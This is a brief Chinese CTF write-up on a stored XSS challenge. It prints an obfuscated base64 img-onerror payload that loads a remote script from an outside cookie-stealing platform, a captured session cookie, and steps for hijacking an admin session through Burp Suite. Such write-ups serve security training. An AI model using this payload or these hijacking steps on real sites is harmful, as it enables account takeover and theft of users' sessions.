进入题目页面如下,有吐槽和登录两个可注入点
根据题目可知是一道XSS
登陆界面没有注册,尝试简单的SQL注入也不行
回到吐槽界面,输入简单的xss代码
<script>alert(1)</script>
访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台
可以使用下面这个平台,创建项目
XSS安全平台
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43
后台路径 http://web/backend/admin.php
根据提示构造url并访问
4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php
还没改cookie qyq
在burp suite中改cookie值并放行
再次访问,最终得到flag
